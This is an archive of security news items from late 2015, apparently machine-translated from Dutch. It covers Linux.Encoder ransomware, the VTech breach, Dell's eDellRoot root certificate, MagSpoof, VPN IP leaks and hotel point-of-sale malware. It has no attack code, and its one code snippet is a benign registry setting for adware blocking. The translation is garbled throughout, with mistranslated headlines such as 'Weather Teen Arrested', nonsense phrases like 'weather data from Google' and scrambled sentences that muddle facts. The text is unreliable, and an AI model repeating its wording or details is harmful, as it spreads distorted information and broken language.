Tuesday, 1 December 2015

Linux Ransomware Encrypts 3000 Websites



In recent weeks there have been the ransomware which it has provided encrypted hit 3,000 websites on Linux web servers. This places the Russian anti-virus company Doctor Web, which relies on weather data from Google. It is called ransomware Linux.encoder.

Attackers behind ransomware deliberately set WordPress websites and online stores using Magento. Through a still unknown vulnerability know the attackers to gain access to the Web server that hosts the website and then perform Linux.encoder.This ransomware, which additional duties require encrypts all kinds of files, and then asks one bitcoin, what with the current exchange rate is 349 euros. It is unknown how many webmasters have finally paid the ransom.

F-Secure reported in early November, about 36 people had paid, which at that time corresponded to an amount of 12,000 euros. Due to an error encrypted files can be decrypted without paying. The Romanian anti-virus company BitDefender has developed a free decryption tool for victims. From examination of the virus fighter shows that an early version of ransomware already was distributed on August 25 of this year and then seven people paid the ransom.

Monday, 30 November 2015

British Woman For 2.3 Million Euros Ripped Through Dating Scam


In Britain, a woman for 2.3 million euros ripped through a dating scam. The woman met on a dating site a man posing as a wealthy engineer. After the man's wife had built a relationship she was asked during a period of 10 months for various loans. Eventually she made about 1.6 million pounds, converted 2.3 million.

Two of the gang members were sentenced last week. According to the British police in the past year 100 victims of dating fraud analyzed taking internet scammers managed to steal a total of 5.7 million euros. In addition, people walk not only on dating sites risk. Recently, a British woman approached via Skype and eventually ripped off for 360 000 euros.

British police advises Internet users who are talking with potential partners over the internet to pierce pathetic stories, and not by just letting a photo fooled. Also, people can not send money to people abroad that they have not met or barely know. Continue to be drawn to the question of potential online partners in doubt. Many scammers give all sorts of compliments and ask many questions, but tell little about himself.

Sunday, 29 November 2015

NSA Stopped Mass Storage Phone Data


US intelligence NSA has stopped the massive storage of telephone data, so reporting news agency Reuters, CNN and the intercept. In June, President Barack Obama decided to implement various reform measures and to limit the powers of the NSA.

So the Secret Service should not collect unfocused phone records of US citizens. Instead, the NSA will now have to be more focused work, in which first a court order is required, after which telecom operators may be asked to keep phone records of certain people or groups of people for a maximum period of six months.

The measure is a victory for privacy advocates and saw Edward Snowden, who felt that the NSA had this much power to spy on citizens. However, the NSA has asked the court to be allowed to continue using the data stored to date to February 29, 2016 on a limited scale. The judge must still here a judgment on it.

Major Security Flaws In Hacked Toy Manufacturer VTech


The Chinese manufacturer of educational toys VTech where recently the data of 4.8 million adults and 200,000 children were stolen customer data had not properly secured, according to the Australian security expert Troy Hunt that captured customer data analyzed.

Recently managed to get an attacker access to the customer database and approached Vice Magazine. The journalist of the magazine then contacted Hunt to verify the data. Hunt was sent several files, the largest of which was 1,7GB. This file, called parent.csv, he found the details of 4.8 million people. It was e-mail addresses, names, IP address, mailing address and encrypted passwords. The password proved to be hashed with the MD5 algorithm. It is therefore not directly readable, but MD5 has long been considered unsafe because it is easy to 'crack'. This allows an attacker can still retrieve the password.

VTech had not taken additional measures to protect the passwords, such as the use of "salts" and "stretching". However, it is not the only security problem, says Hunt. As the website does not use SSL, so all communications, including passwords, unencrypted occurs. There is no cryptographic protection of sensitive data, the expert noted. The website appears to provide a SQL statement back at login. The attacker said that he had come in via SQL injection, a problem that has been known since 1998 but is ignored by some companies still. Finally Hunt criticizes the extensive use of Flash on the website of VTech.

The expert also manages the website Have I Been Pwned, where Internet users can check whether they appear in the database of hacked websites. The data of the 4.8 million adults from the database of VTech here are now added. That does not apply to the data of 227 000 children who also were in the stolen data. Hunt has not been added. VTech has confirmed a burglary, but do not know how the attacker managed to get inside.

Saturday, 28 November 2015

Criminals Copy Debit Cards Via Stereo Skimming


The past quarter have criminals in a European country copied via stereo skimming debit cards, reports the European ATM Security Team (EAST), an organization that maps fraud with payment terminals. EAST receives data from a large number of countries.

It is the first time that the organization receives notification to stereo-skimming successfully applied. In traditional skimming criminals copy the magnetic stripe of a debit card through a cross mouth placed on the ATM. In order to prevent skimming anti-skimming devices are used that emit a "jamming signal". In stereo skimming there are two headlines that read information from the magnetic strip and store it via audio technology. The first reading head strikes the jamming signal and map data, while the second read head only stores the jamming signal. Due to the one of the other subtracting remain on the map data.

Thanks to MP3 technology, this method would again make a comeback, according to InformationWeek. The technique in the past, has been used once before. In 2013 a simple stereo-skimming device was an Irish ATM discovered. In late September of this year reported security TMD Security that it had found new stereo-skimming technology in Ireland. The device would be based on existing stereo-skimming technology, but use sophisticated new technologies allowing the jamming signal be neutralized.

EAST late in the present report do not know to which country it is where the message came from, but Ireland is one of the countries that provide data to the organization. However, it still seems to be a novelty, since 17 countries reported the traditional skimming of debit cards. Also made ​​one country reported criminals who had downloaded via malware money from an ATM, and also became a 'black box attack reports', where criminals connect a personal device on the ATM and the machine so give commands to money through the issuance channel off to give.

Leak VPN Providers Can Reveal IP Address Users


A vulnerability in some VPN providers can ensure that the real IP address of users is revealed, warns VPN provider Perfect Privacy. A VPN (Virtual Private Network) is a secure connection between a computer and a server elsewhere on the Internet.

This connection is encrypted which others can not observe. All Internet traffic to and from the computer goes through this route shielded and can on this part will not be overheard. Additionally, VPN users can thus protect their IP address as websites visited only see the IP address of the VPN provider. According Perfect Privacy walk users of some VPN providers still risk their real IP address is known.

Port forwarding

The problem is with VPN providers offering port forwarding. It does not matter whether users of the VPN providers themselves use port forwarding, only the attacker must set it. To determine the IP address of a victim, there must be fulfilled several conditions. For example, the attacker must have an active account with the same VPN provider and the victim. The attacker must know the 'exit' IP address of the victim and the victim to open a file or page.

An attacker who port forwarding is activated can then request to see the image or website which the real IP address of the victim is from. In total, nine tested Perfect Privacy VPN providers, of which five were found vulnerable. These parties have been notified. The problem, however, with other VPN providers are not tested, warns Perfect Privacy.

BitTorrent

According to security expert Darren Martyn can leak be used to expose BitTorrent users who illegally download copyrighted material. To shield their IP address are BitTorrent users who use a VPN service. By leak holders can still see the IP addresses of illegal downloaders. Martyn expects that companies connected with suing copyright infringers concerned will use this vulnerability to sue BitTorrent users.

Hacked Site Reader's Digest Spread Malware


Attackers have managed to hack the website of Reader's Digest and use this now to spread malware. Before that anti-malware company cautions Malwarebytes. According to the company, there is an increase in the number of hacked WordPress websites and Reader's Digest is one of them.


On the hacked websites is placed code that visitors unnoticed to a page with the Angler-exploitkit forward. This exploitkit is using known vulnerabilities in Adobe Flash Player and Internet Explorer users have not patched. In case the attack is being installed Bedep Trojan on the computer successfully, which can install additional malware again.

Reader's Digest was a few days ago warned by Malwarebytes, but the security company and got no response when a blog posting about the infection appeared online yesterday distributed the website still malware.

Registry Hack Windows Defender Will Change To "Adware-Killer '


Yesterday, Microsoft announced that it is the business security of a new feature has provided thus also potentially unwanted software and adware are stopped, but via a small adjustment to the registry, this function can also be activated by consumers.

It reports the German Heise Online. Under potentially unwanted software called Microsoft understands software bundles containing adware, toolbars and other unwanted programs. To protect against organizations here, the software giant's business solution System Center Endpoint Protection (SCEP) and Forefront Endpoint Protection (FEP) with a new opt-in feature. In conjunction with Windows Defender can therefore download and install unwanted software are blocked.

The feature is not exclusive to business environments. Due to a change in the registry which is namely also available for common Windows systems. According to Heise Online is the function to stop adware not only added to SCEP and FEP, as well as Windows Defender, which is present in all Windows versions since Windows 8. In a test by the German IT magazine shows Windows Defender after the adjustment indeed unwanted software such as blocking Freemake Video Converter. The test was performed on the Home and Pro version of Windows 10.

To make the adjustment must be set below in bold text in a text file, which then the file extension from .txt to be changed in reg. Then the file must be opened and the register adjustment is made.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ Windows Defender \ MpEngine] "MpEnablePus" = dword: 00000001

Friday, 27 November 2015

Microsoft Protects Companies From Unwanted Software


Microsoft has the business security of a new feature provided in order to protect businesses and organizations from potentially unwanted software. It involves, for example so-called software bundles containing adware, toolbars and other unwanted programs.

According to the software giant this program may increase the risk of getting infected corporate networks with malware or make it harder to identify malware infections. It would also burden the helpdesks and time consuming to remove the applications. To protect corporate users from this kind of software security solutions System Center Endpoint Protection (SCEP) and Forefront Endpoint Protection (FEP) with a new opt-in feature rich, so Microsoft through a blog posting disclosed.

The feature can detect potentially unwanted programs and stop, so they are not downloaded or installed. Microsoft claims that the blocking of such software should be an explicit choice, and companies are wise to do to set policy on here. Even end users should be alerted in this case, so they know that potentially unwanted programs are not allowed in the operating environment and will block the security products such software.

FBI Warns Online Shoppers To Online Fraud


The FBI has the festive arrival of online shoppers for Internet fraud warning, as offers that are too good to be true. According to the police for criminals prepare themselves for the holidays and will try through creative scams to steal both money and private information.

Thus, Internet users are advised to not fall into offers that seem too good to be true. Also should be avoided websites that offer high discounts. Consumers should also pay attention to social media and installing smartphone apps, according to the FBI. Before an app downloaded from an unknown source users must first read reviews. In addition, some apps pose as game and are offered free, but in reality, trying to steal all kinds of personal information.

In addition to the FBI, the Computer Emergency Readiness Team of the US Government (US-CERT) Internet phishing, malware and other scams during the holidays warned. This will include recommended to purchase online to pay by credit card because it provides extra protection. Also, all online transactions should be printed before the arrive purchased products.

EFF Wants Stronger Encryption Against Terrorists And Criminals



If the government were to ask people to remove the good locks on their doors and windows and replacing them worse so that government employees can penetrate more easily in case someone is a terrorist, no one would accept this because bad locks make everyone vulnerable.

Yet this is exactly what governments and law enforcement agencies in the case of encryption will, according to the American civil rights movement EFF. Regularly advocate agencies like the FBI to add backdoors in encryption, ensuring encrypted communication can still be tapped. This is similar to prevent people from getting access to good locks and locksmiths can produce good locks.

In this last example, most people would understand that this is not a wise idea, says Cindy Cohn of the EFF. However, when it comes to Internet and technology, such as the operation of encoding, which for many people is less clear. Parties such as the FBI and politicians would also have known better, says Cohn. "The answer to insecure networks and digital technologies must be correct in order to make them safer."

But that is not what is happening, so she continues. Policymakers are therefore urged to take this into account. "Ensuring that everyone's door is unlocked, is not the answer to crime or terrorism. That is the development and support of better security," Cohn decision.

Ransomware Irritates Users Via Audio Message



Besides which also ransomware encrypts files or computers locking is ransomware that attacks only the browser, and a new variant users try a different way to force them to pay. The browser ransomware pretends to be "Microsoft Official Support".


A pop-up ransomware users to believe that there are problems with the computer and a phone number to be called. In addition, an audio message will be repeated continuously which states that there are viruses and adware on the computer are available and the specified number to be called to remove them. If users try to close the pop-up will open a new pop-up.

Unlike ransomware that encrypts or locks the computer files, browser-ransomware is easy to solve. Users can close the browser using the Task Manager, which is also browser-ransomware disappears. Security firm RSA says that despite the simplicity of the solution, this ransomware focuses on users who have no knowledge of this type of threat or know how they can remedy via Task Manager, and finally call the telephone number provided. This number is then the victim of scam artists who try to light up.

FBI Suspect In Case Of 1.2 billion Stolen Logins


The FBI has a suspect in the case of 1.2 billion stolen usernames and passwords. Last August announced the US firm Hold Security that it had uncovered a gang that through SQL-injection 1.2 billion unique passwords had been stolen at about 420,000 websites.

Research documents from the FBI show that the investigation service has found an email address that may be involved in the theft. The email address was registered in 2010 and was one of "mister gray" who offered his spam services. As part of the investigation, the FBI discovered on a Russian hacking forum a message from one "mr.grey" which in 2011 the login details of Facebook, Twitter and UK users offered. The information comes from a request from the FBI last year submitted to search e-mail and data last week has become public and which news agency Reuters on message. Further details about the state of research are lacking.

IT Vendor LANDesk Warns staff After Hack


The American IT vendor LANDesk has staff warned that their data may have been stolen in a burglary on the network, but LANDesk employees to know that the hack goes much further and there may also be source code was stolen. LANDesk develops software for computer management.

The company has issued a warning recently that suspicious activity is detected on the IT systems. In addition, the data may be stolen by employees, the company said. Details will not, however, give the IT provider, but it does know that the environments of customers using the LANDesk software no risk. Across IT journalist Brian Krebs tell several employees that the attackers may have been since June 2014 had access to the systems. This is clear from the logs.

The burglary was discovered only after an employee complained about a slow internet connection. The survey also showed that the attackers passwords IT manager and system had been compromised. Lists also were found with source code and build evers who had compiled the attackers. Through the source code, it could be easier for attackers to find vulnerabilities in the software and allows companies to attack. However, a spokesman would not confirm or deny that the break-source code has been captured.

Thursday, 26 November 2015

Millions Of Vulnerable Devices By The Same Encryption Keys


Researchers warn that millions of devices such as Internet routers, IP cameras and modems are vulnerable because they use the same encryption keys. Attackers can therefore perform man-in-the-middle attacks and eavesdropping and decrypt encrypted traffic.

Therefore might enter sensitive information into the wrong hands. The problem is with so-called embedded devices, including routers, modems, IP cameras and VoIP phones. Researchers from security firm SEC Consult watched for their research firmware more than 4,000 such devices from more than 70 manufacturers.

They mainly looked at cryptographic keys in firmware, such as public keys, private keys and certificates. It mainly involves keys that are used to connect through SSH and X.509 certificates used for HTTPS. In total, were found more than 580 unique private keys in the 4,000 studied devices.

This information was then correlated with data from large-scale Internet scans. It emerged that the dataset with the 580 unique keys contains the private keys of 9% of the HTTPS web hosts and the private keys of more than 6% of all SSH hosts.At least 230 of the 580 keys were actively used and seen by millions of hosts.

The keys are added by manufacturers to provide connection via HTTPS and SSH. The problem is that all devices with the appropriate firmware using the same keys. It was remarkable that the same keys were found in the products of different manufacturers. For example, a certificate of Broadcom were found on the Internet at more than 480,000 units, including Linksys and ZyXEL. The problem also arises in Cisco, Huawei, Ubiquiti Networks and other vendors. The devices are especially vulnerable in the United States (26.3%) and Mexico (16.5%).

Solution

SEC Consult has worked with the CERT Coordination Center (CERT / CC) at Carnegie Mellon University to warn the manufacturers involved and browser developers. Meanwhile, some parties have released updates. Manufacturers also are advised to use unique cryptographic keys for each device. In addition, Internet service providers to ensure that remote access over the WAN port to the equipment of their subscribers is not possible. Finally end users are advised to generic SSH keys and X.509 certificates on their devices to replace unique versions. However, the CERT / CC states that in many cases, there is no practical solution is available.

Hacker Creates Tool That Disables Chip & Pin



The well-known hacker Samy Kamkar has a new tool developed by which he can disable the Chip & Pin feature on credit cards and it is possible to emulate credit cards and magnetic stripes. In this way, all credit cards and magnetic stripes of someone on one device can be stored.



It can also MagSpoof like Kamkar calls his creation, predicting credit card numbers and expiration dates of American Express. For this there is need a full credit card number, but it does not matter if this number ever reported missing in the past or has been reported stolen. MagSpoof is able to generate a strong electromagnetic field which emulates a traditional magnetic stripe card. Kamkar remarks that MagSpoof does not make it possible to use credit cards of others. Moreover, opportunities for American Express numbers to predict and Chip & PIN disable not in the present version has made ​​available to the hacker.

The device is therefore intended primarily for conducting research into magnetic stripes, micro controllers and electromagnetism. During the development of MagSpoof Kamkar discovered that he also Chip & Pin feature of the card can be disabling. If users with a debit card with Chip & PIN using their magstripe the payment will say that the user must map "dipping" for added security.

The information on the card Chip & Pin features is stored in the magnetic strip. Kamkar discovered that he can adjust this. As a result, it is possible to not be required for dipping to a card with Chip & Pin, while the transaction is carried out simply. In this way, the security measure may be bypassed. To help researchers away Kamkar the blueprint MagSpoof published as well as the software and required components. According to the hacker's machine is easy via an Arduino and other general parts to put together.

Tor Project Asks For First Time Donations


The Tor Project, the organization that maintains the Tor network and Tor Browser, asks Internet users for the first time running for donations. The website had been a button present to donate, but now it is actively sought donors wishing to contribute to the development of the Tor network.


A large part of the revenue of the Tor Project comes from the US government. To avoid too much of this funding only depend now decided a crowdfunding campaign launch. Since no restrictions on crowdfunding can sit the money thus brought to projects which are spent according to the Tor Project are most important and can react quickly to changing circumstances.

Through the Tor network, Internet users can hide their IP address and visit censored websites. It is used daily by 2.5 million people, including in totalitarian regimes. The Tor Project is self-described as an American non-profit organization that focuses on research, development and education of online anonymity and privacy. Although many people daily surf the Internet via Tor Browser and the Tor network, the donation button on the website has been used in previous years no 8,000 times.

Apple Users Slow To Install iOS Updates


Apple users are slow to install iOS updates, with 86% of users of an iPhone or iPad a week after the release of iOS nine still was not upgraded. This enables the US security firm Duo Security on the basis of its own research.

After the end of the second week since the release of iOS nine had 25% of users install the new iOS version. A month after the launch of iOS ninth was around 40% switched from the investigated users. It also showed that many users use very outdated versions like iOS 7 or older. According Duo Security has serious security risks.

The latest iOS versions namely remedy several vulnerabilities that an attacker with physical access to bypass the screen lock. This makes it possible to gain access to messages, view photos or bypass other security measures. Organizations therefore be advised to have their iOS users to emphasize the importance of updates, especially given the ease of iPads and iPhones are updating.

Linux Ransomware Demanding $ 999 For Decryption



A new variant of ransomware that on Linux web servers has provided asking $ 999 for decrypting the encrypted files, but Russian victims to their files free of charge by cyber criminals leave decrypt.

Linux.encoder such as ransomware is called, has provided on WordPress websites and web shops running on Magento. The attackers know exactly how to get in is still not clear. Once active Linux.encoder encrypts all kinds of files on the server. Initially the early ransomware $ 50 to decrypt the files, but that rose to $ 500. However now discovered variant asks $ 999 for decryption and wants victims to pay within seven days.

In addition, the creators seem to make an exception for Russian victims, reports anti-malware company Malwarebytes. In one case was discovered there a Russian message. This states that if a Russian website, the files can be decrypted free. According Malwarebytes find the attacks probably is automated and may countrymen of the attackers who inadvertently website is encrypted in this way recover their files free of charge.

Weather Teen Arrested For Attack On TalkTalk


The British authorities have arrested a teenager again because of the attack on the ISP TalkTalk. In the attack, the data were more than 156 000 customers stolen. In total there are now arrested five people, including four teenagers. The teenager who is now arrested a 18-year-old boy from Wales.

He is suspected of extortion. Shortly after the burglary last month at the British Internet service was announced the director said that the company was extorted by the assailants. Further details of the fifth suspect are not given. Besides the 18-year-old boy also be a 20-year-old man, two boys aged 16 and a boy of 15 suspected of involvement in the attack. Three of them will continue to be heard next March. Due to the burglary, which is still not known how that occurred, TalkTalk decided all subscribers a gift to give.

Wednesday, 25 November 2015

Dell Software Installs Dangerous Root Certificate


Users of Dell computers have been warned again for a dangerous certificate that is installed by a program of the computer manufacturer on laptops, desktops and tablets and that cyber criminals can use it to launch attacks on the system.

Therefore it warns CERT Coordination Center (CERT / CC) at Carnegie Mellon University. Initially, it was warned for Dell Foundation Services a root certificate called eDellRoot installs with private key. Now it appears Dell System Detects install such a root certificate with corresponding private key. This certificate is DSDTestProvider.

Dell System Detect (DSD) is a program that users should start and communicates with the Dell Support Page. On some systems, DSD is installed by default. The program installs a root certificate private key. An attacker can use it is to generate certificates that are signed by the certificate authority DSDTestProvider.

Systems that rely DSDTestProvider the certificate authority will also certificates from the trust authority. An attacker can thus mimic websites and other services, software and e-mail sign and decrypt network traffic and other data. It is, among other things, man-in-the-middle attacks on HTTPS traffic and installing malware. The CERT / CC recommends to withdraw the root certificate, which can be done via the Windows Certificate Manager.

Hilton Hotel Chain Discovered Malware On POS Systems


Hilton hotel chain has customers warned that possibly their credit card information stolen after it different POS systems malware has been detected. The malware was designed to steal the name of cardholder, credit card numbers, security codes and expiry dates.

Address details and PINs would not be captured. The malware was active from November 18 to December 5 last year and from April 21 to July 27 of this year. Customers in this period at a Hilton Worldwide hotel have used their credit cards are advised to check their statements. The chain does not know how many credit cards may be compromised and how the POS systems became infected. The malware was eventually discovered through its own systems.

Hilton further states that customers generally not for fraudulent activity on their debit are responsible and should notify their bank if they find irregularities. Furthermore, the chain offers customers a year of free credit monitoring. The malware would by now have been removed and the security of the hotel systems have been tightened.

Lenovo Used Insecure Password For Admin Account


Computer manufacturer Lenovo has released an update to the System Update tool that fixes two critical vulnerabilities could allow a local attacker to gain system or administrator rights. The software is installed on most Lenovo computers and checks for new versions of drivers and other software. Using the software, users can also download and install updates.

The first issue (pdf) in the System Update tool concerned the temporary system administrator account that Lenovo created.This account was generated in a predictable name and insecure password, which allows a local user could then gain admin privileges. The second problem (pdf) concerned a legal problem which allows a local unprivileged user could execute Windows commands with system privileges.

Both vulnerabilities were discovered by security firm IOActive in October and early November reported to Lenovo. The computer manufacturer came last week, 17 days after the notification, with an update to the System Update tool. Then are the details of the vulnerabilities now publicly made, including a proof-of-concept that shows one of the attacks. Lenovo users are advised to install version 5.07.0019 or later of the System Update tool.

More Dangerous Certificates On Dell Computers Discovered



On Dell computers appear to present certificates are more dangerous than just eDellRoot root certificate which since yesterday is to warn and allowing users to be attacked. Reported that the security firm Duo Security on the basis of its own research.

Dell turns since August computers to install the same root certificate called eDellRoot, including associated private key.Something that, according to researchers at Duo Security is a pretty big mistake. " Using the certificate can be man-in-the-middle attacks against users are executed and it is for example possible to install malware or encrypted connections to eavesdrop. In addition, there appears to be a second eDellRoot certificate. The second license was found on 24 IP addresses. Which models are exactly is unknown.

"It suggests that Dell is deliberately identical keys in other models. This is a blatant disregard for basic cryptographic security," said the researchers. One of the systems used was accessible via the internet and certificate to offer Web services over HTTPS was a SCADA system. Such systems are used, among other vital infrastructure.

Finally an Atheros Authenticode certificate was also detected for the signing software. The password of the certificate was cracked within six hours. However, the certificate was found to have expired already, which restricts the possibility for abuse. However, it seems that the certificate was in use at the time that it was still valid.

Manufacturers Do Not Learn

According to the researchers, the discovery reveals a disturbing trend among manufacturers. Adding Trusted Certificates to a system, and especially root certificates can expose users to unnecessary risks. "Unfortunately it appears that manufacturers do not learn from past mistakes and keep them to keep repeating," the conclusion of the research (pdf). Dell has now indicated that it eDellRoot certificate via an update will be removed.

Britons Arrested For Scan Service For Malware


British police have two people arrested for offering services that allow criminals to scan and encrypt their malware. It is a 22-year-old man and woman from Colchester after investigation by the UK National Crime Agency and Trend Micro were arrested.

Through a website, the two different services offered, both free and paid, that malware authors were able to scan their files. In this way could be checked or virus scanners recognized the malware. In case anti-virus software detected the malware services were offered to make those undetectable via encryption. Malware Creators could previously purchase a license. Statistics from the website would show that since February this year take place more than 1.2 million scans.

Dell Will Remove Dangerous Certificate Of Computers



Computer manufacturer Dell will begin today with the removal of a certificate that allows users to be attacked, as the company has announced. Since August this year, laptops and desktops from Dell comes with a certificate that contains the private key.

Attackers can use this key to sign malware for example, so it looks like that comes from Dell, and are also man-in-the-middle attacks on HTTPS sites possible. According to Dell, the certificate is no malware or adware. It was deliberately placed on systems to help customers. Through the certificate Dell's help desk can identify the service tag of the system and quickly identify the computer model, operating system and other components.

The computer manufacturer states in a blog posting that the certificate inadvertently introduces vulnerabilities. Something that Dell makes excuses for that. The company now has instructions (docx) put online how the certificate can be removed in question, and will also release an update starting today to remove the certificate. Also, all new systems will be delivered without a certificate. In the blog posting thanked Dell also researchers Hanno Böck, Joe Nord and Kevin Hicks who published about the security issue. Dell customers who want to know whether they are vulnerable to these via this website testing.

Update

"The security and privacy of our customers are of utmost importance to Dell. The recent situation relates to an" on-the-box "support certificate is intended to provide customers a better, faster and simpler support experience. Until Dells regrets the license shall carry an unintended security vulnerabilities along with it. To solve this problem we will provide our customers with instructions to remove this certificate permanently from their systems, "

"We go to the instructions via email on our support website and communicate via our technical support, we go the Certificate of all remove Dell systems that need to be made. Please note:. Business customer an image of their own Managing this issue does not affect systems. Dell does not install any adware or malware. The certificate will not reinstall itself if it is properly disposed of according to the process recommended by Dell. "

It also has CERT Coordination Center (CERT / CC) at Carnegie Mellon University, a warning issued to the certificate. It is also recommended to remove the certificate.

Tuesday, 24 November 2015

Adware Virus Turns Out Trick-Through Certificates


An adware family that has been active for several years used a new trick to disable virus scanners and other security software on computers, so it is regarded as a trojan. Once the active adware start a variety of tasks that show advertisements on the computer.

In addition, all shortcuts to be adjusted at the desktop, taskbar and Start menu. What is new is that the adware 13 certificates of anti-virus companies such as Avast, AVG, BitDefender, McAfee, and Malwarebytes, now classifies as 'not trusted'.Therefore applications such certificates can not be started. Because of this method, anti-malware Malwarebytes company decided to brand the adware henceforth as a trojan.

German Government: TrueCrypt Still Suitable For Encryption


The popular encryption software TrueCrypt is still suitable for encrypting files, according to the German government on the basis of study (pdf) conducted by the renowned Fraunhofer Institute. Last year the decision makers of the software to cease support.

Also, the use of the encryption software was not recommended. The German Federal Office for Security in Information Technology, part of the German Ministry of the Interior, therefore, gave the Fraunhofer Institute therefore to investigate the commission for vulnerabilities in TrueCrypt. The encryption software was in fact also recommended for encrypting confidential information.

According to the researchers TrueCrypt still suitable for encryption of data on storage media. "Especially in mobile scenarios, such as the use of laptops or USB storage, disk encryption or encrypted containers are very important for protecting critical data," said Thomas Caspers of the BSI. The researchers do say that there are several problems. For example, the use of cryptography in TrueCrypt is not optimal.

Nevertheless, the researchers do not give negative advice. Caspers according to the study provides a sound basis for determining the safety that can provide TrueCrypt and derivatives. Thus, in Germany a customized version of TrueCrypt developed called Trusted Disk. In addition, the research may help to improve these programs, according to the BSI.

New Ransomware Variant Linux Uses OpenSSL



Researchers have discovered a new variant of ransomware that encrypts Linux web servers.Linux.Encoder.2, as this variant is called, however, appeared earlier than Linux.Encoder.1 where early November was warned. The second would be used in September and October.

The attackers deliberately set WordPress websites and web shops running on Magento. The attackers know exactly how to enter, according to the Russian anti-virus company Doctor Web is not yet known. Once access to the server is obtained encrypted files and victims get a message that they have to pay. A difference between the first and second variant is the use of OpenSSL instead of PolarSSL. Why the creators of the ransomware SSL library has changed is unknown.

Like the first variant the second variant can also be decrypted so that victims do not have to pay. However, the decryption tools are not removing the infected server to the shell script. Thus, the attackers can infect the server. Victims are advised to call the police, do not change the contents of encrypted directories and not to delete files from the server.

Monday, 23 November 2015

Fuss About Self-Signed Certificate On Dell Laptops


On the Internet fuss about a self-signed certificate which all Dell laptops would be delivered. On social news site Reddit reports reader Kevin Hicks how his new XPS Dell laptop a self-signed root certificate discovered called eDellRoot. Allows users could be attacked, for example via malware that uses the certificate.

The certificate on the Dell laptops is its own private key features that can not be exported. The key however, been found to be able to be copied. Dell user Joe Nord discovered on his laptop the same root certificate using the same private key.According to Nord Hicks and this is exactly the same situation as with Lenovo and Superfish debacle. The laptops from Lenovo came with adware that could intercept the encrypted traffic using a self-signed certificate to inject in here then ads.

In the case of Dell, however, the situation looks very different. The certificate can not be used namely to issue other certificates to perform eg man-in-the-middle attacks on HTTPS sites, says another reader on Reddit. Yet there is also criticism that Dell does not use a certificate from a valid certificate authority. Dell leaves in front of Hicks that eDellRoot is a trusted certificate and not a threat. Hicks's remark that the certificate or a security risk is the Dell Webcare team announced that the company will come with an explanation of the presence of the certificate. A spokesman confirmed to Security.NL Dell later today comes with an explanation.

Researcher Cracks DecryptorMax-Ransomware


A German researcher has succeeded DecryptorMax-ransomware which recently appeared to crack, causing casualties free their files to recover. The DecryptorMax-ransomware encrypts ransomware like other kinds of files on the computer.

Then a warning that must be paid. Unlike other ransomware, as CryptoWall the ransom amount doubles after a certain time, DecryptorMax victims gives 24 hours of time, otherwise the decryption key will be deleted and encrypted files will never be decrypted.

Fabian Wosar Emsisoft Anti-Malware now discovered that it is possible to retrieve the decryption key by brute force. This allows victims do not have to pay the ransom. Wosar developed a tool called DecryptInfinite in order to retrieve the decryption key. This tool requires a non-encrypted version of one of the encrypted files. In the case of victims not talking about have eg they can download an unencrypted PNG file from the Internet.

Then, the email address should be specified that the ransomware in the warning to show the victim. This information uses the tool for brute Forcen the decryption key. Something that can take some time. When the key is found, the tool show. But prevention is better than cure. Internet users therefore be advised to be cautious with email attachments. DecryptorMax spreads through email attachments posing as vacancies, reports the forum Bleeping Computer.

FBI Warns Officials For Attacks By Hacktivists


The FBI has a warning issued in which the police and other government staff warns of cyber attacks by hacktivists. In addition to attacks in which there is information about agents and officials is gathered and published, there have also been attacks observed attempting to hack into the email accounts of agents and officials.

Recently, there was still an old private mail account CIA director cracked. According to the FBI's use of social media can increase the chance of being attacked. The attacks are not directly aimed at the person but are carried out via eg the ISP or email provider. Thus, the attackers use social engineering to steal information from these parties, which they eventually gain access to email accounts.

Actions

To limit such attacks advises the FBI's use of two-factor authentication, turn on privacy settings, limiting the social media footprint, no post information about work or function online, be careful with online responses, secret questions and answers unanswerable simply, regularly changing passwords is also more than 15 characters and should also advise families to secure their accounts properly. The FBI provides advice to government personnel to periodically check what information about themselves online to find.

Sunday, 22 November 2015

Starwood Hotels Hit By Malware Infection



Starwood Hotels & Resorts Worldwide has declared that 54 of its hotels in North America have been infected with malware which have had unauthorized access to credit card information. The malware has been detected in payment in souvenir shops, restaurants, and other retail outlets.

The 54 compromised hotels are located throughout the United States and Canada. The complete list is here published. The hotels have been infected from November 2014 until June 30 of this year.

Data created booty include customer names, credit card numbers, security codes and expiration dates. Starwood declares that there has been no access to customer data such as addresses, dates of stay and called loyalty card information.

To Starwood Hotels & Resorts include the Sheraton, Westin, and W Hotels but also hotels like the Palace Hotel in San Francisco and the Walt Disney World Dolphin Resort in Orlando.

Starwood recommends that customers who have visited the affected hotels urgently to keep their bank statements closely. Claims to have Starwood after the malware has been removed taken extra security measures to prevent such an attack occur again.

It is certainly not the first time, and it probably will not be the last time, which has become a victim of a chain called Point of Sale malware infection. Similar attacks have in recent months also discovered at the Hilton and Trump hotels.

Saturday, 21 November 2015

XSS Vulnerability Addressed In LinkedIn



Business networking site LinkedIn has a cross site scripting (XSS) vulnerability fixed in the website. Security Expert Rohit Dua from India Wednesday posted a message about the leak on Full Disclosure. LinkedIn Help forum did not have adequate security, the profile pages of LinkedIn were not vulnerable.


To exploit the vulnerability must be a user logged in. When starting a discussion on the Help pages, it was possible for an attacker to execute code in the form fields. The code then implemented, was also open to non-visitors.

LinkedIn has vulnerability - with the help of Dua - rectified within three hours, writes Threat Mail. According been a spokesman for LinkedIn are private data of users at no time in danger and there is no abuse of the vulnerability.

PayPal Phishing Site On World Bank Group Website



A website run by the World Bank Group, has this week been compromised. The site climatesmartplanning.org, which was provided with a valid Extended Validation SSL Certificate, appeared for a short time one hardly be distinguished from real phishing site with a PayPal login page.

Visitors were asked to sign in with their own PayPal information. The entries were processed and sent to the criminals.

After this gave the site gave a message that the account data is temporarily not available, and it required an additional verification. Visitors were invited to give their name, date of birth, address, telephone number and finally to give up your credit card number plus the CSV code, writes Netcraft. Those who had completed everything, was eventually transferred to real website of PayPal.

According to Netcraft, the criminals can take advantage of the smart Extended Validation SSL certificate that has the site climatesmartplanning.org. Made it seem as if the site was to be trusted. The EV certificate has been revoked.

The Climate Smart Planning Platform is an initiative led by the World Bank, to develop employees with tools, data and knowledge to be busy in developing countries with climate change.

Microsoft Improves Edge Browser In Windows 10


Microsoft has its Edge browser in Windows 10 safer. The browser is also resistant to unwanted DLL injections. The new version of Edge to Edge HTML rendering engine 13 that is built into Windows 10, no longer used by ActiveX and Browser Helper Objects. Allows the user is better protected against so-called binary injection attacks.

